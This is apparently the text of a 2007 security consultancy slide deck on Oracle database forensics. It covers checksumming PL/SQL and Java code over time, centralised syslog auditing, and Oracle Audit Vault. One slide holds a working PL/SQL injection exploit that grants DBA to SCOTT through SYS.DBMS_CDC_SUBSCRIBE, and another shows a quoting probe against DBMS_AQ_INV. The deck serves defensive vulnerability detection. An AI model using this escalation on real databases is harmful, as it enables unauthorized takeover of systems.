paul m. wright security consultant and software developer at ngssoftware advanced check-summing over...

NGS ConsultingN e xt G e n e ra tio n Se c u rity So ftwa re Ltd .

Paul M. Wright Security Consultant and Software Developer at NGSSoftware

Advanced Check-summing Over Time and Oracle Audit Vault

http://www.sans.org/index.php

http://www.giac.org/

Copyright © 2007. NGS Software Ltd.

NGS ConsultingN e xt G e n e ra tio n Se c u rity So ftwa re Ltd .Advanced Oracle Security Forensics at UKOUGAdvanced Oracle Security Forensics at UKOUG

User inserts their own SQL into the programs SQL • Usual cause is poor input validation• PL/SQL procedures execute with the permissions of the

definer by default ~ similar to SUID on UNIX• SQL injected by PUBLIC will run with the privileges of SYS

via a SYS package that is definer rights.• Privilege escalation ~ PUBLIC User to DBA • 400+ injection vulnerabilities 2004-2007

SQL Injection in Oracle PL/SQL packagesSQL Injection in Oracle PL/SQL packages



Example for Example for 10g10g

CREATE OR REPLACE FUNCTION "SCOTT"."ATTACKER_FUNC" return varchar2 authid current_user as pragma autonomous_transaction;

BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';

COMMIT;

RETURN ‘ ‘;

END;

/

-- Inject the function into the procedure

BEGINSYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||SCOTT.ATTACKER_FUNC()||''');

END;

/



Patching has its problems.Patching has its problems.

• Oracle patching is complex and has also had some problems with reliability.

• On top of this is the problem of keeping track of the patches that have been installed.

• Historically the recommended method to record patch level was pen and paper.

• Oracle recommend using opatch and the inventory records the patch activity.

• The main problem has been the unreliability of opatch and the inventory to record completed patches.

• Solution to problem of auditing vulnerability?....



Correlating file size and pre-written checksumCorrelating file size and pre-written checksumSQL> exec sys.dbms_aq_inv.purge_persistent_scq_table('aaa','aaa',‘a''a');BEGIN sys.dbms_aq_inv.purge_persistent_scq_table('aaa','aaa','a''a'); END;*ERROR at line 1:ORA-01756: quoted string not properly terminatedORA-06512: at "SYS.DBMS_AQ_INV", line 566ORA-06512: at line 1

It is vulnerable!!

--known bad checksum returns positive from this query.SQL> SELECT OWNER, NAME FROM DBA_SOURCE WHEREOWNER='SYS'AND NAME='DBMS_AQ_INV' AND TEXT LIKE '%786e 1907%';OWNER NAME• ------------------------------ ------------------------------• SYS DBMS_AQ_INV

Blue is checksum and green is file size. But is this sure??



Forensics checksumming techniques used for Vulnerability detectionForensics checksumming techniques used for Vulnerability detection

• Better to calculate the checksums ourselvesthan rely on the ones in the DB.

• For example SYS.DBMS_CDC_SUBSCRIBE vulnerable checksum…

(SELECTAVG(dbms_utility.get_hash_value(text,1000000000,power(2,30)

FROM DBA_SOURCE WHERE OWNER='SYS' AND

NAME='DBMS_CDC_SUBSCRIBE')INTERSECT

(SELECT 1589846530.572519083969465648854961832061 FROMDUAL);

This query returns true if vulnerable



• Need to add timestamps• File size check• Make query using fully qualified names of base tables

SELECT sys.obj$.owner#, sys.obj$.NAME, sys.source$.obj#, Count(sys.source$.line), ctime, mtime, stime, avg(dbms_utility.get_hash_value(source,1000000000,power(2,30)))

from sys.source$ join sys.obj$

ON sys.source$.obj#=sys.obj$.obj#

where sys.obj$.name = 'DBMS_CDC_SUBSCRIBE’

And sys.obj$.owner# = 0GROUP BY sys.obj$.owner#, sys.source$.obj#,ctime, mtime, stime,sys.obj$.NAME;

Checksum algorithm collisions?? Could be improved!!Checksum algorithm collisions?? Could be improved!!



Improve strength of the checksumming algorithmImprove strength of the checksumming algorithm

• DBMS_UTILITY.GET_HASH_VALUE is available on 7, 8, 9, 10 and fast but has different implementation on 7 therefore a different checksum is returned. This is not good for forensic consistency, but it is quick so good for low priority jobs like patch checking.

• DBMS_OBFUSCATION.MD5 is on 9 and 10 (not 8) and cryptographically stronger than DBMS_UTILITY but slower due to the more complex computation.

• DBMS_CRYPTO HASH_SH1 is on 10 only and slow but the most secure of the three. Additionally, use of MD5 and SHA1 together is not susceptible to malicious use of a collision where two files with differing content have the same checksum. http://www.doxpara.com/md5_someday.pdf. By using stripwire

• See book for an example to check the state of VIEWs in a given schema using SHA1 algorithm:



Check the checksummerCheck the checksummer

SELECT sys.obj$.owner#, sys.obj$.NAME, sys.source$.obj#, Count(sys.source$.line), ctime, mtime, stime, avg(dbms_utility.get_hash_value(source,1000000000,power(2,30)))

from sys.source$ join sys.obj$


where sys.obj$.name = 'DBMS_UTILITY'

GROUP BY sys.obj$.owner#, sys.source$.obj#,ctime, mtime, stime,sys.obj$.NAME;



Reverse Engineering wrapped PLSQLReverse Engineering wrapped PLSQL

• Been able to unwrap PLSQL fully for 3 years.• Does this conflict with the DMCA?• Finnigan/Kornbrust have just gone public with part

implemented unwrapper.• Is an unwrapper justified in order to audit Oracle

source code for Malware?• Avoid that question so…• Another answer is within the law, reliable and free…



Compare ciphertext to known goodCompare ciphertext to known goodSELECT sys.obj$.owner#, sys.obj$.NAME, sys.source$.obj#, ctime, mtime, stime,

AVG(dbms_utility.get_hash_value(source,1000000000,power(2,30))) as sum

from sys.source$ inner join sys.obj$


where sys.obj$.name = 'DBMS_UTILITY'

AND source like

'%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

U7Bi%‘ GROUP BY sys.obj$.owner#, sys.source$.obj#,ctime, mtime, stime,sys.obj$.NAME;

Compare the known good Ciphertext from trusted source with the checksummer that is being verified.



VIEW statechecking using SHA1 algorithm:VIEW statechecking using SHA1 algorithm:• CREATE TABLE SHA1VIEWSTATES(SHA1SCHEMA VARCHAR2(40), SHA1NAME

VARCHAR2(40), SHA1CHECKSUM VARCHAR2(40));CREATE OR REPLACE PROCEDURE SHA1DBVIEWSTATECHECKER(lvschema in varchar2) AS TYPE C_TYPE IS REF CURSOR;CV C_TYPE;string varchar2(32767);l_hash raw(2000);lvname VARCHAR2(30);lvtype varchar2(30) :='VIEW';beginOPEN CV FOR 'SELECT DISTINCT OBJECT_NAME FROM SYS.DBA_OBJECTS WHERE OBJECT_TYPE=''VIEW'' AND OWNER = :x' using lvschema;LOOPFETCH CV INTO lvname;DBMS_OUTPUT.ENABLE(200000);l_hash:=dbms_crypto.hash(dbms_metadata.get_ddl(lvtype, lvname, lvschema), dbms_crypto.hash_sh1);dbms_output.put_line('HashSHA1='||l_hash||' Name='||lvschema||'.'||lvname);insert into SHA1VIEWSTATES values(lvschema, lvname, l_hash);EXIT WHEN CV%NOTFOUND;END LOOP;CLOSE CV;end;/



JAVA statechecking ~ often actual source of PL/SQL vulnerabilitiesJAVA statechecking ~ often actual source of PL/SQL vulnerabilitiesDECLAREV_OBJID NUMBER:=0;V_HASH NUMBER:=0;V_BUFFER RAW(32767);CUR NUMBER;RES NUMBER;POS NUMBER;LEN NUMBER;BEGINDBMS_OUTPUT.ENABLE(1000000);SELECT distinct SYS.OBJ$.OBJ# INTO V_OBJID FROM SYS.OBJ$, SYS.USER$ WHERESYS.USER$.USER#=SYS.OBJ$.OWNER# AND SYS.OBJ$.TYPE#=29ANDSYS.USER$.NAME='SYS' andSYS.OBJ$.NAME='oracle/CDC/ChangeTableTrigger';CUR:=DBMS_SQL.OPEN_CURSOR;DBMS_SQL.PARSE(CUR,'SELECT S.PIECE FROM SYS.IDL_UB1$ S WHERE S.OBJ# = :1',DBMS_SQL.NATIVE);DBMS_SQL.BIND_VARIABLE(CUR, ':1', V_OBJID);DBMS_SQL.DEFINE_COLUMN_RAW (CUR, 1, V_BUFFER, 32767);RES := DBMS_SQL.EXECUTE_AND_FETCH (CUR);IF RES > 0 THEN DBMS_SQL.COLUMN_VALUE_RAW(CUR,1,V_BUFFER);V_HASH:= V_HASH + SYS.DBMS_UTILITY.GET_HASH_VALUE(V_BUFFER,1,1073741824);DBMS_SQL.CLOSE_CURSOR (CUR);DBMS_OUTPUT.PUT_LINE(V_HASH);V_BUFFER:=NULL;END IF;END;



OS level file statecheckingOS level file statechecking

• Tripwire and NIST NSRL known goods mainly.• UNIX sha1sum or Windows FCIV• Oracle binary in case it has been patched.• Password file in case there is an added user that may

not shown in the sys.user$ table. See paper SYSDBA Backdoor

http://www.oracleforensics.com/wordpress/index.php/2007/10/14/sysdba-backdoor/



Collection of statechecks over time and change management connectionCollection of statechecks over time and change management connection

• OS checksums• PL/SQL checksums• Java checksums• Source code check for the state of the checksummer• These need storing over time for historic comparison.• Known goods and bads.• Also useful for change management

• Keep track of development changes in production code.• DBA unofficial policy of no change. • Problem is that DBA does not actually know for sure that there has been no

change. Vulnerable files may have been reverted.• Developers may have made unauthorised changes.Can solve both problems of change management and security vulnerability

management with comparison of checksums over time.

• This information is sensitive and should be kept off the server.



Centralised SYSLOGCentralised SYSLOG

• Very difficult to stop PL/SQL injection privilege escalation in Oracle.• At least need to know that it happened as a user can get from DB to

OS very easily and then delete OS based mandatory audit.• Can’t stop this only know that it happened.• Central SYSLOG host for Oracle i.e. not local OS based.• 10gR2 logging to SYSLOG means that central loghost tools can now

be used to collect Oracle AuditSQL> ALTER SYSTEM SET audit_trail=OS SCOPE=SPFILE;SQL> ALTER SYSTEM SET audit_syslog_level=’USER.ALERT’

SCOPE=SPFILE;System altered.

SQL> SHUTDOWN IMMEDIATESQL> startupNeed to keep this archived SYSLOG somewhere safe too…



DepositoryDepository

• Checksums over time archive for retrospective risk to new zero days.

• Syslog centralised for off server mandatory audit• SQuirreL for Oracle vulnerability scanner reports• Safe keeping of security tools like the checksummer.• This machine has to be very secure as it is the basis of

the rest of the organisations security.• Bastion Host could be called a Depository.• Similar thinking in parallel at Oracle OAV.



Oracle Audit VaultOracle Audit Vault



Oracle Audit VaultOracle Audit Vault• Pro’s –

• OS audit off the server.• Allows multiple log correlation.• Encrypted network transmission.• Good piece of software

• Against -• Too big and complex therefore more attack surface therefore might not be the safest

place to keep this, the most security sensitive information.• Expense

If you have time and expertise implement your own Depository for SYSLOG and for the checksums you collect over time using a hardened linux server and minirsyslogd.

At the URL below:http://bent.latency.net/bent/darcs/minirsyslogd1.02/src/minirsyslogd1.02.tar.gzAs described in Oracle Forensics Book..



• Ready for purchase at http://www.rampant-books.com and all good book shops which solves the problem of what to buy the “DBA who has everything” for Christmas this year..

New book on Oracle ForensicsNew book on Oracle Forensics



ConclusionsConclusions

• PL/SQL injection is a serious threat• Forensic principles can be adapted to Oracle identify

vulnerable PL/SQL and database malware more accurately.• Archived statechecking provides proof of historic risk.• Also change management perspective.• Centralised SYSLOG is needed to know a hack has

happened.• Secure Depository required to archive this security data. • OAV has some of these qualities and is a step in the right

direction.• Still essential to use a good vulnerability scanner regularly.

NGS ConsultingN e xt G e n e ra tio n Se c u rity So ftwa re Ltd .

Copyright © 2007. Next Generation Security Software Ltd.

All other trade marks are the property of their respective owner, and are used in an editorial context without intent of infringement.

Questions?

http://www.sans.org/index.php

http://www.giac.org/

paul m. wright security consultant and software developer at ngssoftware advanced check-summing over...

Documents